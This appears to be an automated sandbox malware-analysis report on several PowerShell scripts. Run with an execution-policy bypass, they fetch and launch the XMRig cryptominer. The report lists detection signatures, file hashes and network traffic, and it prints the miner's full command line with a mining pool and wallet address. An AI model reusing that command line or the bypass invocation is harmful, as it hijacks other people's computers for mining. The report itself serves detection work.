memory/3004-53-0x000001F0957E0000-0x000001F095800000-memory.dmp

memory/3004-51-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-52-0x000001F0955B0000-0x000001F0955D0000-memory.dmp

memory/1868-54-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp

memory/3004-55-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-56-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-58-0x000001F0957E0000-0x000001F095800000-memory.dmp

memory/3004-57-0x000001F0955B0000-0x000001F0955D0000-memory.dmp

memory/3004-59-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-60-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-61-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-62-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-63-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-64-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-65-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-66-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-67-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-68-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-69-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-70-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-71-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-72-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-73-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-74-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-75-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-76-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-77-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-78-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-79-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-80-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-81-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-82-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-83-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-84-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-85-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-86-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-87-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-88-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-89-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-90-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-91-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-92-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-93-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-94-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-95-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-96-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-97-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-98-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-99-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-100-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-101-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-102-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-103-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-104-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-105-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-106-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-107-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-108-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-109-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-110-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-111-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-112-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-113-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-114-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-115-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-116-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/3004-117-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win10-20240404-en

Max time kernel

1790s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4780-3-0x00007FFC7A793000-0x00007FFC7A794000-memory.dmp

memory/4780-5-0x000002416EE60000-0x000002416EE82000-memory.dmp

memory/4780-8-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-9-0x000002416F490000-0x000002416F506000-memory.dmp

memory/4780-10-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3v4z2hv.vqz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4780-25-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-48-0x000002416F810000-0x000002416F822000-memory.dmp

memory/4780-61-0x000002416EE90000-0x000002416EE9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3528-90-0x000002B08C250000-0x000002B08C270000-memory.dmp

memory/3528-91-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/4780-92-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-93-0x00007FFC7A793000-0x00007FFC7A794000-memory.dmp

memory/3528-94-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/4780-95-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-96-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/3528-97-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-98-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-99-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-100-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-101-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-102-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-103-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-104-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-105-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-106-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-107-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-108-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-109-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-110-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-111-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-112-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-113-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-114-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-115-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-116-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-117-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-118-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-119-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-120-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-121-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-122-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-123-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-124-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-125-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-126-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-127-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-128-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-129-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-130-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-131-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-132-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-133-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-134-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-135-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-136-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-137-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-138-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-139-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-140-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-141-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-142-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-143-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-144-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-145-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-146-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-147-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-148-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-149-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-150-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-151-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-152-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-153-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-154-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-155-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-156-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

memory/3528-157-0x00007FF6586E0000-0x00007FF659313000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win7-20240215-en

Max time kernel

1561s

Max time network

1562s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

memory/2232-4-0x000007FEF566E000-0x000007FEF566F000-memory.dmp

memory/2232-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

memory/2232-9-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2232-8-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2232-10-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2232-7-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2232-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/2232-11-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2232-12-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:40

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1750s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp

Files

memory/1616-3-0x00007FFC02D83000-0x00007FFC02D84000-memory.dmp

memory/1616-5-0x00000265C85B0000-0x00000265C85D2000-memory.dmp

memory/1616-6-0x00007FFC02D80000-0x00007FFC0376C000-memory.dmp

memory/1616-9-0x00007FFC02D80000-0x00007FFC0376C000-memory.dmp

memory/1616-10-0x00000265C87D0000-0x00000265C8846000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5u4du1l.k4p.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1616-26-0x00007FFC02D80000-0x00007FFC0376C000-memory.dmp

memory/1616-37-0x00007FFC02D80000-0x00007FFC0376C000-memory.dmp

memory/1616-50-0x00000265C8770000-0x00000265C8782000-memory.dmp

memory/1616-63-0x00000265C8750000-0x00000265C875A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4120-92-0x0000028D2C2A0000-0x0000028D2C2C0000-memory.dmp

memory/1616-93-0x00007FFC02D83000-0x00007FFC02D84000-memory.dmp

memory/1616-94-0x00007FFC02D80000-0x00007FFC0376C000-memory.dmp

memory/4120-95-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-96-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-97-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-98-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-99-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-100-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-101-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-102-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-103-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-104-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-105-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-106-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-107-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-108-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-109-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-110-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-111-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-112-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-113-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-114-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-115-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-116-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-117-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-118-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-119-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-120-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-121-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-122-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-123-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-124-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-125-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-126-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-127-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-128-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-129-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-130-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-131-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-132-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-133-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-134-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-135-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-136-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-137-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-138-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-139-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-140-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-141-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-142-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-143-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-144-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-145-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-146-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-147-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-148-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-149-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-150-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-151-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-152-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-153-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-154-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-155-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-156-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

memory/4120-157-0x00007FF6B92B0000-0x00007FF6B9EE3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
